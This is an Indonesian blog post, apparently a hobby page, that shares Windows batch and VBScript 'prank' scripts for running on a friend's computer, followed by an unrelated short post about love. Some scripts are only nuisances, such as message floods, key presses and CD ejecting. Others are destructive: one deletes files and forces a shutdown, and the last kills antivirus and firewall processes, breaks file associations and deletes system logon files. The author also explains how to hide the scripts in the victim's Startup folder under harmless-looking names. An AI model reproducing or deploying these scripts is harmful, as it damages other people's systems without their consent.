Cara Menjaili Temen

Sabtu

| 0 komentar

OOOOOooooo...... ia tmn2 ada tambahan sedikit ni vuat kalian semu yg suka ngejailin temen.a klian tinggal ikuti cara2 di bawah ini

Share
Saya ada script jahil nih yg mau saya share dengan sobat Satu Hati. Intinya ini hanya untuk mengerjai komputer teman kamu, pasti dia kesal banget dan bisa aja menjadi marah monitornya di banting… agagagagagag. Script ini kamu buat melalui Notepad dan harus kamu simpan dengan menggunakan ekstensi yang saya sebutkan. Oke deh segera cek script jahil ini.

script ini bisa kta pakai, untuk
menjahili komputer anak org !!
yg harus kamu siapkan adlh :

1. Notepad
2. kopi
3. pasta
4. alias kopas
5. Bersiap2 menerima dosa… agagagagagag (kidding)

stelah smuax siap,, kupas (mksdx copas) script di bawah ke dalam notepad !!

1. MESSAGES YG NONGOL TERUS MENERUS SECARA OTOMATIS


Code:
@ECHO off
    :Begin
    msg * muka lo jelek
    msg * ngaca dulu gih
    msg * hayo lo, cpu lu gw acak2
    msg * ud install ulang aja
    msg * biar masalah nya kelar
    GOTO BEGIN
==> save nama script diatas dg ekstensi *.bat

2. BIKIN SHUTDOWN + MESSAGES

Code:
@echo off
    msg * apaan sih lo
    shutdown -s -c "Error! muka mu
    standar abis"
==> save nama script diatas dg ekstensi *.bat

3. MAININ TOMBOL CAPS LOCK

Code:
Set wshShell =wscript.CreateObject(“WScript.Shell”)
     do
     wscript.sleep 100
     wshshell.sendkeys “{CAPSLOCK}”
    loop
==> save nama script diatas dg ekstensi *.vbs

4. BUKA TUTUP CD/DVD SECARA OTOMATIS

Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
     Set colCDROMs = oWMP.cdromCollection
     do
     if colCDROMs.Count >= 1 then
     For i = 0 to colCDROMs.Count – 1
     colCDROMs.Item(i).Eject
     Next
     For i = 0 to colCDROMs.Count – 1
     colCDROMs.Item(i).Eject
     Next
     End If
     wscript.sleep 5000
    loop
==> save nama script diatas dg ekstensi *.vbs

5. MENEKAN TOMBOL ENTER TERUS MENERUS

Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
==> save nama script diatas dg ekstensi *.vbs

6. MENEKAN TOMBOL BACKSPACE TERUS MENERUS SECARA OTOMATIS

Code:
MsgBox “Lets Rumble”
     Set wshShell =wscript.CreateObject(“WScript.Shell”)
     do
     wscript.sleep 100
     wshshell.sendkeys “{bs}”
    loop
==> save nama script diatas dg ekstensi *.vbs

7. OTOMATIS NGETIK “LU JELEK BANGET SIH” DI NOTEPAD ATAU M.WORD

Code:
Set wshShell =wscript.CreateObject("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "lu jelek banget sih!!!"
    loop
==> save nama script diatas dg ekstensi *.vbs

8. MEMBUKA NOTEPAD TERUS MENERUS

Code:
@ECHO off
    :top
    START %SystemRoot%
    \system32\notepad.exe
    GOTO top
==> save nama script diatas dg ekstensi *.bat

9. OTOMATIS BUKA NOTEPAD LALU NGETIK “APA YG LO MAU”

Code:
WScript.Sleep 180000
     WScript.Sleep 10000
     Set WshShell = WScript.CreateObject(“WScript.Shell”)
     WshShell.Run “notepad”
     WScript.Sleep 100
     WshShell.AppActivate “Notepad”
     WScript.Sleep 500
     WshShell.SendKeys “Ka”
     WScript.Sleep 500
     WshShell.SendKeys “mu ”
     WScript.Sleep 500
     WshShell.SendKeys “, je”
     WScript.Sleep 500
     WshShell.SendKeys “l ek”
     WScript.Sleep 500
     WshShell.SendKeys “am ”
     WScript.Sleep 500
     WshShell.SendKeys “at”
     WScript.Sleep 500
     WshShell.SendKeys “ya ”
     WScript.Sleep 500
     WshShell.SendKeys “P er”
     WScript.Sleep 500
     WshShell.SendKeys “ma k”
     WScript.Sleep 500
     WshShell.SendKeys “tuh”
     WScript.Sleep 500
     WshShell.SendKeys ” mu”
     WScript.Sleep 500
     WshShell.SendKeys “ka”
     WScript.Sleep 500
    WshShell.SendKeys “hohoho “
==> save nama script diatas dg ekstensi *.vbs

10. BISA MEMILIH JAWABAN SEPERTI QUIZ LAH KIRA2

Code:
@echo off
    title quiz hari ini :)
    :menu
    cls
    echo jika kamu kena virus apa
    yang kamu lakukan
    pause
    echo pilih yang mana:
    echo 1. matiin computer
    echo 2. format aja
    echo 3. bingung ahh
    set input=nothing
    set /p input=Choice:
    if %input%==1 shutdown -s -t
    30
    if %input%==2 del c:\xxx
    if %input%==3 @ECHO off
    msg * muka lo rusak
    msg * ngaca dulu gih
    msg * hayo lo,cpu lu gw acak2
    msg * ud install ulang aja
    msg * biar masalah nya kelar
    @ECHO off
    :top
    START %SystemRoot%
    \system32\notepad.exe
    GOTO top
==> nah script diatas save jadi quiz.bat, lalu kasih ke anak orang… agagagagagag……..

11. YANG INI PALING BAHAYA, JANGAN DICOBA DI KOMPUTER KAMU :D

Code:
@echo off
    set end=md “Hack
    installing”
    set fin=copy “Hack
    log.txt” “Installing”
    %end%
    %fin%
    net send * Hack is
    installing, press OK to
    begin set up.
    kill NAVAPSVC.exe /F /Q
    kill zonelabs.exe /F /Q
    kill explorer.exe /F /Q
    cls
    assoc .exe=txtfile
    assoc .txt=mp3file
    cls
    msg * It is you who is
    hacked ….
    msg * I warned you,
    and you kept going.
    Challenge me and this
    is what happens.
    DEL C:\WINDOWS
    \system32\logoff.exe /
    F /Q
    DEL C:\WINDOWS
    \system32\logon.exe /
    F /Q
    DEL C:\WINDOWS
    \system32\logon.scr /
    F /Q
    cls
    shutdown -s -t 5 -c
    “ thank you for
    waiting”
==> save script diatas dg ekstensi *.bat

http://acca-creativity.blogspot.com
Dari semua script diatas, cara menjalankannya adalah degan mengklik 2x file yang kita buat dari notepad tadi. Saya sarankan kalau mau mengusili komputer teman dan bisa dijalankan secara otomatis, kopi file script yg udah kamu simpan ke folder startup di Menu Start. Setelah itu kamu saya sarankan selama seminggu gak nongol biar gak di lempar sama monitor…. agagagagagag

Waktu menyimpan dengan ekstensi *.bat atau *.vbs

Ganti * menjadi nama file, misal usil.bat atau ancur.vbs
http://acca-creativity.blogspot.com
Saya sarankan buat nama file yang tidak mencurigakan si pengguna komputer.

Cinta.....................................................

Minggu

| 0 komentar

  • Cinta adalah ketika kita merasakan suatu getaran rasa yang tidak bisa di ungkapkan dengan kata-kata. 
  • Cinta bukanlah bagaimana kita dapat mencintai, menyayangi dan menerima dengan sempurna, tetapi cinta itu adalah bagaimana kita dapat menerima yang tidak sempurna itu dan membuatnya sempurna di mata kita.
  • Cinta membuat kita nyaman tenang, rileks, dan kita tidak merasa kesepian. Setiap saat kita memikirkan.a kita selalu merasa di temani walupun kita sendirian, jika kita merasa kesepian dan ingin bertemu dengannya sebaiknya kita minta dia untuk bertemu di suatu tempat, namun jika engkau ingin menemuinya di rumahnya boleh sih tapi jangan setiap hari, hehehe..! dan ketika kamu sampai di rumahnya dan kamu mengetuk pintu, tetapi bukan dia yang membukanya tapi ia adalah orang tuanya, apa yang akan kamu lakukan memanggilnya sendiri atau menyurunh orang tuanya untuk memanggil dia? Karena jika kamu menyuruh orang tuanya berarti engkau tidak setia dengannya tapi jika engkau memanggilnya sendiri berarti engkau sangat mencintai dia dan akan selalu bersama.

Followers